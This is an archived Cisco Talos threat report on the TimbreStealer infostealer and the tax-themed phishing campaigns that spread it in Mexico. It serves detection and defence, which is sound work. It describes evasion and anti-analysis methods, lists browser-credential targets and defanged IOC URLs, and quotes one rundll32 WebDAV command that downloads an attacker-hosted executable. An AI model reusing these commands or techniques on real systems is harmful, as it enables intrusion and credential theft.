{
	"id": "da58e76c-b3f2-4e88-864b-115534508f31",
	"created_at": "2026-04-06T01:32:07.663916Z",
	"updated_at": "2026-04-10T03:24:18.070336Z",
	"deleted_at": null,
	"sha1_hash": "658e0f6fd16ab07688366e37c17cfd418a0e4e59",
	"title": "TimbreStealer campaign targets Mexican users with financial lures",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1278477,
	"plain_text": "TimbreStealer campaign targets Mexican users with financial lures\r\nBy Jacob Finn\r\nPublished: 2024-02-27 · Archived: 2026-04-06 00:32:12 UTC\r\nCisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown\r\nmalware we’re calling “TimbreStealer.”\r\nThis threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related\r\nthemes starting in at least November 2023. The threat actor has previously used similar tactics, techniques\r\nand procedures (TTPs) to distribute a banking trojan known as “Mispadu.”\r\nTimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.\r\nIt contains several embedded modules used for orchestration, decryption and protection of the malware\r\nbinary.\r\nTalos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to\r\ndownload a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least\r\nNovember 2023. This campaign uses phishing emails with financial themes, directing users to a compromised\r\nwebsite where the payload is hosted and tricking them into executing the malicious application.\r\nTalos has observed new distribution campaigns being conducted by this threat actor since at least September 2023,\r\nwhen they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers\r\nbefore changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we\r\nhaven’t found any evidence of Mispadu being used anymore.\r\nThe phishing campaign uses geofencing techniques to only target users in Mexico, and any attempt to contact the\r\npayload sites from other locations will return a blank PDF file instead of the malicious file. 
The current spam run\r\nwas observed to mainly use Mexico's digital tax receipt standard called CFDI (which stands for “Comprobante\r\nFiscal Digital por Internet,” or online fiscal digital invoice in English). Talos has also observed emails with\r\ngeneric invoice themes used in the same campaign. \r\nAlthough we could not find hard evidence linking the two campaigns, we assess with high confidence they are\r\noperated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity\r\ndistributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more\r\nevidence of Mispadu being used. \r\nTimbreStealer, a new obfuscated information stealer\r\nTalos has identified a new family of information stealers while investigating a spam campaign targeting Mexican\r\nusers starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam\r\ncampaign, which we will analyze later.\r\nTimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution,\r\nand ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 1 of 36\n\nconventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit\r\nprocess, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the\r\nauthors are skilled and have developed these components in-house.\r\nSnippet of code showing how the Heaven’s Gate 64-bit switch is executed\r\nThe sample we’re analyzing was found on a victim machine following a visit to a compromised website after the\r\nuser clicked on a link present in a spam email. 
\r\nSample used during this blog analysis\r\nOur analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption\r\nprocess involving a main orchestration DLL and a global decryption key which is used throughout the different\r\nmodules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the\r\ninitial modules and their relationship.\r\nTimbreStealer’s Decryption Process \r\nThis first-layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first\r\nscan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this\r\npoint will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from\r\n32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued. \r\nSnippet of code showing the two different methods used by TimbreStealer to execute system calls to\r\nhide API usage.\r\nOnce this is complete, it will then decrypt the next-stage payload from the .data section. The decrypted DLL has\r\nits MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader then\r\nlaunches the DLL, passing the Zw* hash table as an argument to its exported function. \r\nDecryption of all submodules makes use of a global decryption key. As the execution of the malware progresses,\r\nthis key is encrypted over and over again. If execution does not follow every step of the expected path, the\r\ndecryption key will get out of sync and all subsequent decryptions will fail. 
\r\nThis prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments\r\nto access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption\r\nrounds on the global key are scattered about in the code and even occur from within the different sub-modules\r\nthemselves. \r\nAll stages of this malware use the same coding style and techniques. We therefore assess with high confidence that\r\nall obfuscation layers and the final payload were developed by the same authors. \r\nTimbreStealer’s embedded modules\r\nOnce the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s\r\nbeing executed in a sandbox environment. It will also extract the many submodules embedded in the payload.\r\nTalos identified at least three different layers after the main payload was extracted, with several modules in each\r\nlayer used for different functions:\r\nDiagram showing the different module relationships in TimbreStealer.\r\nThe second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest\r\nand extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first\r\nchecks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin\r\nAmerican region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to\r\nensure it is not running in a sandbox environment. \r\nAt this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of\r\nprevious infection, and scan the system browsers for signs of natural use. 
The files and registry keys checked by\r\nthe malware include the non-exhaustive list below:\r\nHKLM\\SOFTWARE\\Microsoft\\CTF\\TIP\\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}\r\n{A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = \u003cvalue\u003e\r\n{E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = \u003cvalue\u003e\r\n{DB2D2D69-9EE0-9A3C-2924-67021A31F870} = \u003cvalue\u003e\r\n{6EF3E193-61BF-4F68-9736-51CF6905709D} = \u003cvalue\u003e\r\n{3F80FA11-1693-4D05-AA83-D072E69B77FC} = \u003cvalue\u003e\r\n{419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = \u003cvalue\u003e\r\nC:\\Windows\\Installer\\{E1284A06-8DFA-48D4-A747-28ECD07A2966}\r\nGlobal\\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U\r\nThe presence of these keys, along with the other checks mentioned before, will prevent the execution of the remaining\r\nstages of the malware.\r\nThe orchestrator contains four other encrypted sub-modules within it. \r\nIDX Size CRC32 Purpose\r\n0 8 KB 0xF25BEB22 Shellcode loader for stripped DLLs\r\n1 100 KB 0xEB4CD3EC DLL - not analyzed yet\r\n2 60 KB 0xFA4AA96B DLL - Anti-VM and anti-analysis, system-of-interest checks\r\n3 3.92 MB 0xAB029A74 DLL - Installer with encrypted payload\r\nAll blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of the data and\r\ncan optionally decompress the raw data if specified. This overall architecture has been observed in all layers. \r\nEach stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred\r\nto this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.\r\nSnippet of code showing how TimbreStealer executes the embedded shellcode modules\r\nSubmodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on\r\nthe global decrypt buffer. If any check fails, the installer module will not decrypt properly. 
Checks in this layer\r\ninclude:\r\nVMware hook and port checks.\r\nVpcext, IceBP, int 2D instructions to detect debuggers.\r\nChecking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone,\r\nsafespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd,\r\ngoogle_persistentdisk.\r\nIf all of these checks complete as expected, then the final module can be decrypted successfully. \r\nSubmodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy\r\ndocument will also be displayed to help deflect suspicion. \r\nFiles dropped by the payload installer module after machine-of-interest checks passed\r\nExecution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses\r\nMicrosoft’s reg.exe to add a RunOnce registry key, and then triggers rundll32.exe to process this entry through the\r\nsystem iernonce.dll.\r\nScheduled Task configuration to run the installed DLL\r\nUnder certain conditions, this layer can also modify Group Policy options to set startup scripts.\r\nTimbreStealer’s Installed DLL modules \r\nThe installed DLL, named Cecujujajofubo475.dll, uses the same overall architecture as the first DLL detailed\r\nabove: all of its internal strings are encrypted, it uses a global decrypt buffer, and it uses a different Zw* API hash\r\ntable to perform direct syscalls that avoid user-mode APIs. \r\nIn this layer there are also TLS callbacks to add complexity to the global decrypt buffer encryption. An extra round of\r\nencryption has also been added that depends on the parent process name and a value within the registry key given\r\nabove to prevent analysis on third-party machines. 
\r\nThis DLL contains eight encrypted sub-modules within it:\r\nIDX Size CRC32 Purpose\r\n0 0x1000 0x2B80E901 Single XOR function accepting 5 arguments\r\n1 0x1000 0x520200E8 x64 shellcode PE loader\r\n2 0x2000 0x105542F7 x86 shellcode PE loader\r\n3 0x2000 0xC4ECE0A8 Unknown shellcode\r\n4 0x7600 0xC1384E15 Unknown module, seems to be used to decompress other blobs\r\n5 0xD800* 0x1D38B250 Anti-VM/Sandbox layer \r\n6 0x1B600* 0x4F1FEFE3 x86 DLL to extract main payload\r\n7 0x1EE00* 0xF527AC18 x64 DLL to extract main payload\r\n(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.\r\nWhile this DLL contains many of the same protections found in the installation phase, several more have been\r\nidentified in this layer. The first is a patch to the ZwTraceEvent API to disable user-mode Event Tracing for\r\nWindows data collection. \r\nAnother interesting protection overwrites all of the loaded DLLs in the process with clean copies from\r\ndisk. This will wipe all antivirus vendor user-mode hooks, software breakpoints, and user patches during\r\nexecution. \r\nThis DLL serves as a loader for the final payload, which is housed within the ApplicationIcon.ico file shown in the\r\nprevious relationship diagram. Submodule No. 7 is the default loader that the malware attempts to launch.\r\nThe malware attempts to inject this 64-bit DLL into a preferred list of svchost.exe processes. \r\nThe order of preference is based on the svchost.exe process command line, looking for the following strings: \r\nDcomLaunch \r\nPower \r\nBrokerInfrastructure \r\nLSM \r\nSchedule \r\nIf the injections into svchost.exe fail, then a 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. 
A new thread is created using\r\nsyscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the\r\nshellcode are also executed through the syscall mechanism set up earlier. \r\nThe first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL\r\nfrom the ApplicationIcon.ico file. The 32-bit version will again use a custom PE loader to directly load and run the\r\nfinal payload DLL within its own process after extraction.\r\nTimbreStealer’s Final Payload Module\r\nThe architecture of this layer is the same as all of the previous layers, and it contains an additional nine sub-modules.\r\nAnalysis of this final payload module and submodules is still ongoing at the time of writing:\r\nIDX Size CRC32 Purpose\r\n0 0x1000 0x2B80E901 Single XOR function accepting 5 arguments. Matches the previous layer blob #0\r\n1 0x1000 0x520200E8 x64 shellcode PE loader. Matches the previous layer blob #1\r\n2 0x2000 0x105542F7 x86 shellcode PE loader. Matches the previous layer blob #2\r\n3 0x2000 0xC4ECE0A8 Unknown shellcode. Matches the previous layer blob #3\r\n4 0xA5000* 0xB0214A74 Not yet analyzed\r\n5 0x13CC00* 0xE8421ADE Not yet analyzed\r\n6 0x16800* 0xD30A298E Not yet analyzed\r\n14 0x16600* 0x55BFB99 Not yet analyzed\r\n15 0x7C800* 0x2F6F928D Not yet analyzed\r\n(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.\r\nThe following is a preliminary analysis of the malware features based on the strings we were able to decrypt from\r\nthis module. They indicate the malware can collect a variety of information from the machine and post data to an\r\nexternal website, which is typical behavior of an information stealer. 
\r\nCollect credential information from the victim’s machine\r\nThe following strings were found in functions scanning files and directories. This module also embeds the SQLite\r\nlibrary to handle different browsers' credential storage files.\r\nCloudManagementEnrollmentToken\r\nGoogle\\\\Chrome Beta\\\\User Data\r\nGoogle\\\\Chrome Dev\\\\User Data\r\nGoogle\\\\Chrome SxS\\\\User Data\r\nGoogle\\\\Chrome\\\\User Data\r\nGoogle\\\\Policies\r\nMicrosoft\\\\Edge Beta\\\\User Data\r\nMicrosoft\\\\Edge Dev\\\\User Data\r\nMicrosoft\\\\Edge\\\\User Data\r\nSoftware\\\\Google\\\\Chrome\r\nSoftware\\\\Google\\\\Chrome\\\\Enrollment\r\nSoftware\\\\Google\\\\Enrollment\r\nSoftware\\\\Google\\\\Update\\\\ClientState\\\\{430FD4D0-B729-4F61-AA34-91526481799D}\r\nSOFTWARE\\\\Microsoft\\\\Cryptography\r\nSoftware\\\\Policies\\\\Google\\\\Chrome\r\nSoftware\\\\Policies\\\\Google\\\\Update\r\nhistory\r\nfeeds\r\nfeeds cache\r\ninternet explorer\r\nmedia player\r\noffice\r\nOneDrive\r\npackages\r\nSkydrive\r\nFormhistory.sqlite\r\nSELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;\r\nSELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`\r\nMozilla\\\\Firefox\\\\Profiles\\\\\r\nThunderbird\\\\Profiles\\\\\r\nPostbox\\\\Profiles\\\\\r\nPostboxApp\\\\Profiles\\\\\r\nSOFTWARE\\\\Mozilla\\\\Mozilla Firefox\r\nSOFTWARE\\\\Mozilla\\\\Mozilla Thunderbird\r\nSOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ProfileList\r\nSearch for Files\r\nThe malware also scans several directories looking for files, although it is not yet clear for what purpose. We can\r\nsee in the list below folders related to AdwCleaner and Avast Scanner, as well as 360 Antivirus quarantine folders. 
\r\nAnother set of interesting strings in this list is “.Spotlight-V100” and “.fseventsd”, which relate to macOS.\r\n$360Section\r\n$AV_ASW\r\n$GetCurrent\r\n$Recycle.Bin\r\n$SysReset\r\n$WinREAgent\r\n.fseventsd\r\n.Spotlight-V100\r\nAdwCleaner\r\nAMD\r\nAutodesk\r\nboot\r\nBrother\r\nConfig.Msi\r\nDocuments and Settings\r\nEFI\r\nHewlett-Packard\r\ninetpub\r\nIntel\r\nMSOCache\r\nPerfLogs\r\nProgram Files\r\nProgram Files (x86)\r\nProgramData\r\nRecovery\r\nRecoveryImage\r\nResources\r\nSWSetup\r\nSystem Volume Information\r\nSYSTEM.SAV\r\n~MSSETUP.T\r\n$WINDOWS.\r\nAutoKMS\r\nKMSAuto\r\nUsers\r\nAppData\\\\Local\r\nAppData\\\\Roaming\r\nDesktop\r\nDocuments\r\nDownloads\r\nOneDrive\r\nDropbox\r\nCollect OS information\r\nTimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a\r\nwealth of information about the machine where it’s running.\r\nOS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate,\r\nInstallTime\r\nSMBIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion,\r\nSerialNumber, Vendor, Version\r\nHardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios,\r\nWin32_PhysicalMemory\r\nNetwork Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer,\r\nMemberServer, BackupDomainController, PrimaryDomainController\r\nApplication information: DisplayName, Publisher, DisplayVersion, OSArchitecture\r\nSearch for file extensions\r\nThe code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not\r\nassociated with any known file type. 
This may be indicative of a file that is created by the malware itself.\r\n.bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf\r\nLook for URLs Accessed\r\nThe strings below represent URLs of interest to the malware. The list also contains references to a virtual device used to\r\ncapture network packets, which may indicate that the malware can perform network sniffing.\r\nnpf\r\nnpcap\r\nnpcap_wifi\r\nwww.google.com\r\namazon.com\r\ndropbox.com\r\nlinkedin.com\r\ntwitter.com\r\nwikipedia.org\r\nfacebook.com\r\nlogin.live.com\r\napple.com\r\nwww.paypal.com\r\nDisable System Protections\r\nThe malware executes calls to a function used to remove System Restore points on the machine. This is typical\r\nbehavior of ransomware, although Talos has not observed any ransomware activity on infected\r\nvictims. Additional analysis is still needed in order to confirm or discard this hypothesis. \r\nSELECT * FROM SystemRestore\r\nSequenceNumber\r\nSrClient.dll\r\nSRRemoveRestorePoint\r\nSYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Power\r\nHiberbootEnabled\r\nLook for Remote Desktop Software\r\nThe malware attempts to access services and a mutex used by Remote Desktop servers. It’s not clear yet how this is\r\nused in the payload code.\r\nconsole\r\nTermService\r\nGlobal\\\\TermSrvReadyEvent\r\nwinlogon.exe\r\nconsole\r\nPOST data to remote site\r\nA list of URLs along with strings used in HTTP communication was found in functions accessing the network.\r\nThese URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe\r\nthese to be the command and control servers used by the malware, but so far, the samples we analyzed have not\r\ncommunicated back to any of them. 
\r\nPOST\r\nPUT\r\nContent-Disposition: form-data; name=\"\r\n\"; filename=\"\r\n\"\\\\r\\\\nContent-Type: application/octet-stream\\\\r\\\\n\r\nContent-Type: multipart/form-data; boundary=\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nHTTP/1.1 200 OK\\\\r\\\\nDate: %s %s GMT\\\\r\\\\nConnection: Close\\\\r\\\\nAccess-Control-Allow-Origin:\r\n*\\\\r\\\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\\\r\\\\nContent-Type: text/plain;charset=UTF-8\\\\r\\\\n\\\\r\\\\n\r\nhttps://hamster69[.]senac2021[.]org/~armadillo492370/\r\nhttps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/\r\nhttps://69[.]64[.]35[.]1/~route649289/\r\nThese strings are just a small piece of this puzzle, and more analysis is required on the final payload and its\r\nembedded modules to understand their exact purpose.\r\nPrevious Mispadu spam campaign\r\nActivity associated with these current distribution campaigns was first observed in September 2023 when the\r\nthreat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised\r\nwebsites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an\r\nexternally hosted file upon the victim double-clicking on it. \r\nInternet shortcut (.url) file used in the Mispadu campaign.\r\nBoth URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via\r\nWebDAV. 
This connection is performed by Rundll32.exe with the parameters shown in the example below:\r\nrundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80\r\nhttp://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe \r\nDuring the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in\r\nMexico.\r\nThe .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro\r\nFederal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file\r\nnames also typically contained 6 random digits. \r\nThe Mispadu payload contained a hardcoded C2 address which used HTTPS as its communication protocol. We have\r\nseen a variety of C2 URLs, changing over time but keeping a similar pattern pointing to “it.php” with two\r\nparameters “f” and “w”: \r\nhxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2\u0026w=Windows%2010 \r\nhxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9\u0026w=Windows%2010\r\nhxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2\u0026w=Windows%2010\r\nhxxps://manderlyx[.]com/cruto/it.php?f=2\u0026w=Windows%2010\r\nhxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2\u0026w=Windows%2010\r\nWe observed this campaign to be active until the middle of November, at which time a new payload with\r\nTimbreStealer was dropped on the victims' computers from the compromised website.\r\nThe target industries of this campaign are spread across different verticals with a slight focus on manufacturing and\r\ntransportation, as we can see below:\r\nGraph showing the most targeted industries in the Mispadu campaign.\r\nSpam campaign using CFDI as lure\r\nTalos detected a low-volume campaign using CFDI to lure users to download and execute a malicious file\r\ndisguised as a PDF document starting around the middle of 
November and still ongoing as of February 2024.\r\nCFDI is a mandatory electronic invoice standard used in Mexico for tax reporting. In this campaign, a\r\nspam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.\r\nExample of a spam email distributing the new TimbreStealer malware\r\nThe subjects we observed in this campaign follow the same theme:\r\nRecibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c\r\nRecibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288\r\nThe website uses JavaScript to detect characteristics of the user such as geolocation and browser type and then\r\ninitiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer\r\ndropper using WebDAV. The Zip file is usually named following the same theme:\r\nCFDI_930209.zip\r\nFACTURA_560208.zip\r\nIf the access does not come from Mexico, a blank PDF is served instead of the malicious payload.\r\nMessage displayed after the user visits the site where the initial dropper malware is downloaded.\r\nAll the URLs for this current campaign follow a similar format:\r\nhxxps://\u003csome\u003e.\u003ccompromised\u003e[.]\u003cweb\u003e/\u003ctoken\u003e/\u003c14_char_hex_id\u003e\r\nWhere \u003ctoken\u003e above is one of the following strings: “cfdi”, “factura”, “timbreDigital”, “facdigital” or\r\n“seg_factura”. 
The first part of the domain is also a random Spanish word related to digital invoices followed by\r\ntwo digits.\r\nhxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977\r\nhxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508\r\nhxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5\r\nhxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9\r\nThe .url file this time contains more obfuscation intended to make detection by antivirus products more difficult,\r\nyet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:\r\nInternet shortcut (.url) file used in the TimbreStealer campaign\r\nUser interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to\r\nexecute, at which point the TimbreStealer main infection will start.\r\nATT\u0026CK TTPs Used in TimbreStealer Campaign\r\nATT\u0026CK ID Description\r\nT1566.002 Spearphishing Link\r\nT1566.001 Spearphishing Attachment\r\nT1204.002 Malicious File\r\nT1105 Ingress Tool Transfer\r\nT1190 Exploit Public-Facing Application\r\nT1071.001 Web Protocols\r\nT1036.005 Masquerading: Match Legitimate Name or Location\r\nT1483 Domain Generation Algorithms \r\nT1071 Application Layer Protocol\r\nT1027.009 Obfuscated Files or Information: Embedded Payloads\r\nT1027.010 Obfuscated Files or Information: Command Obfuscation\r\nT1027.002 Obfuscated Files or Information: Software Packing\r\nT1564.001 Hide Artifacts: Hidden Files and Directories\r\nT1497.003 Virtualization/Sandbox Evasion: Time Based Evasion\r\nT1497.001 Virtualization/Sandbox Evasion: System Checks\r\nT1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks\r\nT1055.002 Process Injection: Portable 
Executable Injection\r\nT1055.001 Process Injection: Dynamic-link Library Injection\r\nT1055.012 Process Injection: Process Hollowing\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1082 System Information Discovery\r\nT1486 Data Encrypted for Impact\r\nT1070.001 Indicator Removal: Clear Windows Event Logs\r\nT1012 Query Registry\r\nT1204 User Execution: Malicious File\r\nT1053.003 Scheduled Task/Job: Cron\r\nT1053.005 Scheduled Task/Job: Scheduled Task\r\nT1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1112 Modify Registry\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 63057 - 63072 and 300840 - 300844.\r\nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\r\nWin.Infostealer.TimbreStealer-10021027-0\r\nWin.Infostealer.TimbreStealer-10021026-0\r\nWin.Infostealer.Generic-10017202-0\r\nWin.Packed.Generic-10019162-0\r\nWin.Dropper.Generic-10017203-0\r\nIndicators of Compromise\r\nIOCs for this research can be found in our GitHub repository here.\r\nPotential C2 URLs\r\nhxxps://hamster69[.]senac2021[.]org/~armadillo492370/\r\nhxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/\r\nhxxps://69[.]64[.]35[.]1/~route649289/\r\nIPs\r\n24[.]199[.]98[.]128\r\n159[.]89[.]50[.]225\r\n104[.]131[.]169[.]252\r\n104[.]131[.]67[.]109\r\n137[.]184[.]108[.]25\r\n137[.]184[.]115[.]230\r\n138[.]197[.]34[.]162\r\n142[.]93[.]50[.]216\r\n143[.]244[.]144[.]166\r\n143[.]244[.]160[.]115\r\n146[.]190[.]208[.]30\r\n157[.]230[.]238[.]116\r\n157[.]245[.]8[.]79\r\n159[.]223[.]96[.]160\r\n159[.]89[.]226[.]127\r\n159[.]89[.]90[.]109\r\n162[.]243[.]171[.]207\r\n167[.]71[.]24[.]13\r\n167[.]71[.]245[.]175\r\n167[.]71[.]246[.]120\r\n
192[.]241[.]141[.]137\r\n24[.]144[.]96[.]15\r\n45[.]55[.]65[.]159\r\n64[.]225[.]29[.]249\r\nDrop Site URLs\r\nhxxp://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc\r\nhxxp://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282\r\nhxxp://pdf43[.]marcialledo[.]com/factura/50e1e86db86ff2\r\nhxxp://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb\r\nhxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a\r\nhxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573\r\nhxxps://auditoria42[.]altavista100[.]com/factura/b20569ae393e7e\r\nhxxps://auditoria67[.]mariageorgina[.]com/cfdi/bb743b25f5c526\r\nhxxps://auditoria7[.]miramantolama[.]com/factura/d84d576baf1513\r\nhxxps://auditoria82[.]taoshome4sale[.]com/seg_factura/efebfc104991d4\r\nhxxps://auditoria84[.]meinastrohoroskop[.]com/timbreDigital/8f7b2f8304d08e\r\nhxxps://auditoria88[.]mariageorgina[.]com/factura/3db4832ada4f80\r\nhxxps://auditoria89[.]venagard[.]com/timbreDigital/f6a5f34123d980\r\nhxxps://auditoria92[.]venagard[.]com/factura/2c6652a143f815\r\nhxxps://auditoria93[.]serragrandreunion[.]com/timbreDigital/a2e79b61ac4635\r\nhxxps://comprobante14[.]miramantolama[.]com/seg_factura/fb0b02b2d41b12\r\nhxxps://comprobante2[.]marcialledo[.]com/factura/3ce069ac2b865e\r\nhxxps://comprobante27[.]mariageorgina[.]com/timbreDigital/eada68119275aa\r\nhxxps://comprobante27[.]serragrandreunion[.]com/facdigital/bca7513c9e00b9\r\nhxxps://comprobante27[.]servicioslocomer[.]online/factura/2003b3fe7ae6f4\r\nhxxps://comprobante45[.]altavista100[.]com/cfdi/d13011c95ba2b0\r\n
hxxps://comprobante51[.]meinastrohoroskop[.]com/facdigital/121c0388193ba5\r\nhxxps://comprobante63[.]serragrandreunion[.]com/facdigital/3c45bca741d4f6\r\nhxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186\r\nhxxps://comprobante70[.]miramantolama[.]com/timbreDigital/18665ae0a7b9e1\r\nhxxps://comprobante75[.]meinastrohoroskop[.]com/timbreDigital/bfa30824f1120b\r\nhxxps://comprobante80[.]serragrandreunion[.]com/timbreDigital/bf4a8735ed3953\r\nhxxps://comprobante91[.]servicioslocomer[.]online/timbreDigital/adb6403b186182\r\nhxxps://comprobante93[.]venagard[.]com/cfdi/57880f98ef2b70\r\nhxxps://cumplimiento19[.]altavista100[.]com/timbreDigital/dd141e683a3056\r\nhxxps://cumplimiento35[.]solucionegos[.]top/factura/bde64155cabbe5\r\nhxxps://cumplimiento39[.]meinastrohoroskop[.]com/seg_factura/d4e9d7823adff2\r\nhxxps://cumplimiento43[.]commerxion[.]buzz/facdigital/1ac5acb1a5525b\r\nhxxps://cumplimiento47[.]solucionegos[.]top/seg_factura/7fa6018dc9b68f\r\nhxxps://cumplimiento48[.]callarlene[.]net/seg_factura/c19a0dd4addc3e\r\nhxxps://cumplimiento56[.]timbradoelectronico[.]com/facdigital/dd37434dcde7ad\r\nhxxps://cumplimiento72[.]serragrandreunion[.]com/seg_factura/92cd2425a6c150\r\nhxxps://cumplimiento81[.]paulfenelon[.]com/cfdi/20149ee8e1d3b2\r\nhxxps://cumplimiento91[.]miramantolama[.]com/seg_factura/e907d3